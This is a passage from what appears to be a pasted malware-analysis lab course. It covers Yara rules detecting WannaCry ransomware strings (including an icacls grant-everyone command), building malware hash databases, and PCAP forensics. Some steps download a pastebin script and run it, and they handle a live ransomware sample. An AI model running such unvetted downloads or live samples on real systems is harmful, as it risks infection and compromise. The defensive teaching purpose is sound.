  3332. ---------------------------Type This-----------------------------------
  3333.  
  3334.  
  3335. sudo apt install -y python-pefile
  3336. infosecaddicts
  3337.  
  3338.  
  3339.  
  3340. wget https://pastebin.com/raw/guxzCBmP
  3341.  
  3342.  
  3343. mv guxzCBmP am.py
  3344.  
  3345.  
  3346. vi am.py
  3347.  
  3348. python am.py wannacry.exe
  3349.  
  3350.  
  3351. -----------------------------------------------------------------------
  3352.  
  3353.  
  3354.  
  3355.  
  3356.  
  3357.  
  3358.  
  3359.  
  3360. ###################
  3361. # Lesson 35: Yara #
  3362. ###################
  3363. ---------------------------Type This-----------------------------------
  3364.  
  3365. cd ~/Desktop
  3366.  
  3367. sudo apt-get remove -y yara
  3368. infosecaddcits
  3369.  
  3370. sudo apt -y install libtool
  3371. infosecaddicts
  3372.  
  3373. wget https://github.com/VirusTotal/yara/archive/v3.6.0.zip
  3374.  
  3375.  
  3376. unzip v3.6.0.zip
  3377.  
  3378. cd yara-3.6.0
  3379.  
  3380. ./bootstrap.sh
  3381.  
  3382. ./configure
  3383.  
  3384. make
  3385.  
  3386. sudo make install
  3387. infosecaddicts
  3388.  
  3389. yara -v
  3390.  
  3391. cd ~/Desktop
  3392.  
  3393.  
  3394. -----------------------------------------------------------------------
  3395.  
  3396.  
  3397. NOTE:
  3398. McAfee is giving these yara rules - so add them to the hashes.txt file
  3399.  
  3400. Reference:
  3401. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  3402.  
  3403. ----------------------------------------------------------------------------
  3404. rule wannacry_1 : ransom
  3405. {
  3406. meta:
  3407. author = "Joshua Cannell"
  3408. description = "WannaCry Ransomware strings"
  3409. weight = 100
  3410. date = "2017-05-12"
  3411.  
  3412. strings:
  3413. $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
  3414. $s2 = "Wanna Decryptor" wide ascii nocase
  3415. $s3 = ".wcry" wide ascii nocase
  3416. $s4 = "WANNACRY" wide ascii nocase
  3417. $s5 = "WANACRY!" wide ascii nocase
  3418. $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
  3419.  
  3420. condition:
  3421. any of them
  3422. }
  3423.  
  3424. ----------------------------------------------------------------------------
  3425. rule wannacry_2{
  3426. meta:
  3427. author = "Harold Ogden"
  3428. description = "WannaCry Ransomware Strings"
  3429. date = "2017-05-12"
  3430. weight = 100
  3431.  
  3432. strings:
  3433. $string1 = "msg/m_bulgarian.wnry"
  3434. $string2 = "msg/m_chinese (simplified).wnry"
  3435. $string3 = "msg/m_chinese (traditional).wnry"
  3436. $string4 = "msg/m_croatian.wnry"
  3437. $string5 = "msg/m_czech.wnry"
  3438. $string6 = "msg/m_danish.wnry"
  3439. $string7 = "msg/m_dutch.wnry"
  3440. $string8 = "msg/m_english.wnry"
  3441. $string9 = "msg/m_filipino.wnry"
  3442. $string10 = "msg/m_finnish.wnry"
  3443. $string11 = "msg/m_french.wnry"
  3444. $string12 = "msg/m_german.wnry"
  3445. $string13 = "msg/m_greek.wnry"
  3446. $string14 = "msg/m_indonesian.wnry"
  3447. $string15 = "msg/m_italian.wnry"
  3448. $string16 = "msg/m_japanese.wnry"
  3449. $string17 = "msg/m_korean.wnry"
  3450. $string18 = "msg/m_latvian.wnry"
  3451. $string19 = "msg/m_norwegian.wnry"
  3452. $string20 = "msg/m_polish.wnry"
  3453. $string21 = "msg/m_portuguese.wnry"
  3454. $string22 = "msg/m_romanian.wnry"
  3455. $string23 = "msg/m_russian.wnry"
  3456. $string24 = "msg/m_slovak.wnry"
  3457. $string25 = "msg/m_spanish.wnry"
  3458. $string26 = "msg/m_swedish.wnry"
  3459. $string27 = "msg/m_turkish.wnry"
  3460. $string28 = "msg/m_vietnamese.wnry"
  3461.  
  3462.  
  3463. condition:
  3464. any of ($string*)
  3465. }
  3466. ----------------------------------------------------------------------------
  3467.  
  3468.  
  3469. ##################################
  3470. # Lesson 36: External DB Lookups #
  3471. ##################################
  3472.  
  3473. Creating a malware database (sqlite)
  3474. ---------------------------Type This-----------------------------------
  3475.  
  3476. sudo apt install -y python-simplejson python-simplejson-dbg
  3477. infosecaddicts
  3478.  
  3479.  
  3480.  
  3481. wget https://raw.githubusercontent.com/mboman/mart/master/bin/avsubmit.py
  3482.  
  3483.  
  3484.  
  3485. python avsubmit.py -f wannacry.exe -e
  3486.  
  3487. ----------------------------------------------------------------------------
  3488.  
  3489. Analysis of the file can be found at:
  3490. http://www.threatexpert.com/report.aspx?md5=84c82835a5d21bbcf75a61706d8ab549
  3491.  
  3492.  
  3493.  
  3494.  
  3495.  
  3496.  
  3497.  
  3498.  
  3499.  
  3500. ##########################################
  3501. # Lesson 37: Creating a Malware Database #
  3502. ##########################################
  3503. Creating a malware database (mysql)
  3504. -----------------------------------
  3505. - Step 1: Installing MySQL database
  3506. - Run the following command in the terminal:
  3507. ---------------------------Type This-----------------------------------
  3508.  
  3509. sudo apt install -y mysql-server
  3510. infosecaddicts
  3511.  
  3512. - Step 2: Installing Python MySQLdb module
  3513. - Run the following command in the terminal:
  3514.  
  3515. sudo apt-get build-dep python-mysqldb
  3516. infosecaddicts
  3517.  
  3518. sudo apt install -y python-mysqldb
  3519. infosecaddicts
  3520.  
  3521. Step 3: Logging in
  3522. Run the following command in the terminal:
  3523.  
  3524. mysql -u root -p (set a password of 'malware')
  3525.  
  3526. - Then create one database by running following command:
  3527.  
  3528. create database malware;
  3529.  
  3530. exit;
  3531.  
  3532. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  3533.  
  3534. vi mal_to_db.py (fill in database connection information)
  3535.  
  3536. python mal_to_db.py -i
  3537.  
  3538. ------- check it to see if the files table was created ------
  3539.  
  3540. mysql -u root -p
  3541. malware
  3542.  
  3543. show databases;
  3544.  
  3545. use malware;
  3546.  
  3547. show tables;
  3548.  
  3549. describe files;
  3550.  
  3551. exit;
  3552.  
  3553. -----------------------------------------------------------------------
  3554.  
  3555.  
  3556. - Now add the malicious file to the DB
  3557. ---------------------------Type This-----------------------------------
  3558.  
  3559.  
  3560. python mal_to_db.py -f wannacry.exe -u
  3561.  
  3562. -----------------------------------------------------------------------
  3563.  
  3564.  
  3565. - Now check to see if it is in the DB
  3566. --------------------------Type This-----------------------------------
  3567.  
  3568. mysql -u root -p
  3569. malware
  3570.  
  3571. mysql> use malware;
  3572.  
  3573. select id,md5,sha1,sha256,time FROM files;
  3574.  
  3575. mysql> quit;
  3576.  
  3577. -----------------------------------------------------------------------
  3578.  
  3579.  
  3580.  
  3581. #################################################
  3582. # Lesson 39: PCAP Analysis with forensicPCAP.py #
  3583. #################################################
  3584. ---------------------------Type This-----------------------------------
  3585.  
  3586. cd ~/Desktop
  3587. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  3588. sudo easy_install cmd2
  3589.  
  3590. python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
  3591.  
  3592. ForPCAP >>> help
  3593.  
  3594.  
  3595. Prints stats about PCAP
  3596. ForPCAP >>> stat
  3597.  
  3598.  
  3599. Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  3600. ForPCAP >>> dns
  3601.  
  3602. ForPCAP >>> show
  3603.  
  3604.  
  3605. Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  3606. ForPCAP >>> dstports
  3607.  
  3608. ForPCAP >>> show
  3609.  
  3610.  
  3611. Prints the number of ip source and store them.
  3612. ForPCAP >>> ipsrc
  3613.  
  3614.  
  3615. Prints the number of web's requests and store them
  3616. ForPCAP >>> web
  3617.  
  3618.  
  3619. Prints the number of mail's requests and store them
  3620. ForPCAP >>> mail
  3621.  
  3622. -----------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement